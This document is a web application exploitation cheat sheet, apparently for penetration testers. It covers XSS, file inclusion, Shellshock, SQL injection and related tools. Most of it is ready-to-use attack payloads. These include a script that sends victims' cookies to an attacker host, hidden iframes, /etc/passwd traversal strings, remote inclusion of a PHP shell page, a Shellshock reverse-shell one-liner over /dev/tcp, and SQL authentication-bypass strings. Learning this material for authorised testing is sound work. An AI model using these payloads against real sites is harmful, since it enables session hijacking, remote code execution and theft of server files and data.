Web Application Exploits

Please read the Disclaimer.

There are many different ways a web application can be exploited. This will list a few simple examples, resources and tools.

Browser add-ons:

🔗 Cookies Quick Manager
🔗 Foxyproxy
🔗 Tamper Data
🔗 Knoxss

Commands:

curl
wget

Proxies:

🔗 Burp Suite
OWASP ZAP

Bot Spoofing

Googlebot spoofing to a robots.txt page:

curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://<host>/robots.txt

Authentication Spoofing

Simple Cookies

Some older websites may have weak authentication cookies such as using a conversion of:

user:admin

Then encoding with base64 resulting in a valid header request of:

auth: dXNlcjphZG1pbgo=

To create encoded string:

echo 'user:admin' | base64 -

To create decoded string:

echo 'dXNlcjphZG1pbgo=' | base64 -d -

Padding

Some websites may be vulnerable to padding attacks. Kali has padbuster built in:

padbuster [url] [encrypt] [blocksize] [options]

Resources

🔗 https://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html

🔗 https://spring.io/blog/2014/01/20/exploiting-encrypted-cookies-for-fun-and-profit

XSS

iFrames

Create event listener on attacker machine:

nc -lvp <port>

Reverse Connection

<iframe src="http://<attackeripaddress>:<port>/madeup.php" height="0" width="0"></iframe>

Cookie Stealer

<script>
new Image().src="http://<attackeripaddress>:<port>/madeup.php?output="+document.cookie;</script>

Cookies can then be spoofed using browser plugin or Burp Proxy.

Resources

🔗 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

🔗 https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

🔗 https://gist.github.com/phra/76518994c908ac836ec5a393f188f89a

Local File Inclusion

Example

Server Side Code, without validation:

...
$file = $_GET['file'] 
if (isset($file)) {
    include( $file );
}
...

Intention

Client side request:

http://<host>/index.php?file=myfile.txt

This request will include a file myfile.txt to load.

Exploit

http://<host>/index.php?file=/etc/passwd

This request will expose the server’s local file.

Filter Avoidance

Some code may filter out /.\'" or more characters.

http://<host>/index.php?file=%2Fetc%2Fpasswd

Directory Traversal

http://<host>/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

http://<host>/index.php?file=....//....//....//....//etc//passwd

Remote Code Execution

Server Side Code, without validation:

...
$page = $_GET['page'] 
if (isset($page)) {
    include( $page . '.php');
}
...

Intention

Client side request:

http://<host>/index.php?page=mypage

This request will include a local relative file mypage.php to load.

Exploit

On the attacking machine start a web server:

python -m SimpleHTTPServer <port>

Create a malicious php page:

echo '<?php shell_exec("ifconfig"); ?>' > evil.txt

Make the request:

http://<host>/index.php?page=http://<attackingipaddress:<port>/evil.txt%00

Null Byte Terminator %00 is used to terminate the file so it won’t look for evil.txt.php.

Shellshock

Shellshock is a bug that was discovered in the bash shell that allows for Remote Code Execution. It is most commonly vulnerable in PHP and CGI scripts if they involve system environment variables.

Exploit

Test by seeing if an echoed test string returns from a request:

curl -H "User-Agent: () { :;}; echo 'test';" http://<host>/<page>

If successful, then setup a listener shell on the attacking machine:

nc -lvp <port>

Then send the attack code:

curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<attackingipaddress>/<port> 0>&1;" http://<host>/<page>

Resources

🔗 https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

🔗 https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion

🔗 https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)

SQL/NoSQL Injection

There are many popular types of SQL languages that differ in syntax but their principals are the same:

MySQL
Oracle DB
Microsoft SQL
PostreSQL
MongoDB

In-Band SQLi

The most common type, often considered the default type of SQL injection attacks.

Authentication Bypass

Server Side Example Code, without validation:

...
$user = $_POST['user'];
$password = $_POST['password'];
$query="select * from users where name = '$user' and password = '$password' ";
...
if (mysql_num_rows($queryN) == 1)
// load successful data/page
...

MySQL Table Example Table:

mysql> select * from users;

+----+--------+----------+
| id | name   | password |
+----+--------+----------+
| 1  | admin  | 123456   |
+----+--------+----------+
1 rows in set (0.00 sec)

Intended Results

On a login with username and password fields, a successful query would look something like this:

mysql> select * from users where name='admin' and password='123456';
+----+--------+----------+
| id   | name | password |
+----+--------+----------+
|  1  | admin | 123456   |
+----+--------+----------+
1 row in set (0.00 sec)

And a failed login query would result in no rows returned:

mysql> select * from users where name='admin' and password='1234';
Empty set (0.00 sec)

Exploit

The query returned needs to be 1. This can be exploited by sending a true response such as 1=1 will always be true and adding a LIMIT of 1.

mysql> select count(*) from users where name=admin' 
or 1=1 LIMIT 1;# and password='1234';

The application field could look like:

admin' or 1=1 LIMIT 1;#

This also comments out the password check.

Error Based SQLi

This type of attack can be used to help enumerate server information by receiving error codes from bad requests.

An application with a field could allow a simple test:

'; test

Which may result in an error message back:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.

Union Based SQLi

This is often used after enumeration error based messages. A union in an SQL statement allows for two or more SELECT statements to be returned so long as they have the same data types, same order and rows. A union all will keep duplicate values.

SQL Code Example:

SELECT City FROM Customers
UNION
SELECT City FROM Vendors
ORDER BY City;

Server Side Code Example:

...
$id = $_GET['id'];
...
$q = "SELECT * FROM $tbl_name where id = ".$id;
...

Client Request Example:

http://<host>/page.php?id=2

Exploit

If we try adding order by 1 to the URL and keep incrementing the id= field, once we end up with an error.

http://<host>/page.php?id=2 order by 1

Say after ?id=4 it does not exist, then it can be assumed there is only ids 1, 2, and 3.

http://<host>/page.php?id=1 union select 1,2,3,4

This can setup a payload:

http://<host>/page.php?id=1 union all select 1,2,3,4

http://<host>/page.php?id=3 union select 1,2,version(),4

http://<host>/page.php?id=3 union select 1,2,@@version,4

Resources

🔗 https://rawsec.ml/en/types-of-sql-injection/

🔗 http://www.sqlinjection.net/errors/

Automated Scripts

SQLi

Crawl a page:

sqlmap -u http://<host> --crawl=1

If injection is found:

sqlmap -u http://<host>/page.php?id=738 --dbms=mysql --dump --
threads=5

NoSQLi

Downlaod NoSQLMap:

git clone https://github.com/codingo/NoSQLMap.git

Go into directory and download per-requisites:

cd NoSQLMap/
pip install couchdb pbkdf2 ipcalc

Run

python nosqlmap.py

All Methods

Using OWASP ZAP, once proxy has been setup and application has been scanned or spidered, use Attack mode. Results will end up in Alerts tab with payloads and requests.

Exposed Paths

Look for directories such as:

/robots.txt
/admin
/admin.php etc
/login
/login.php etc
/README
/README.md
/LICENSE
/test/
/test.php etc
/uploads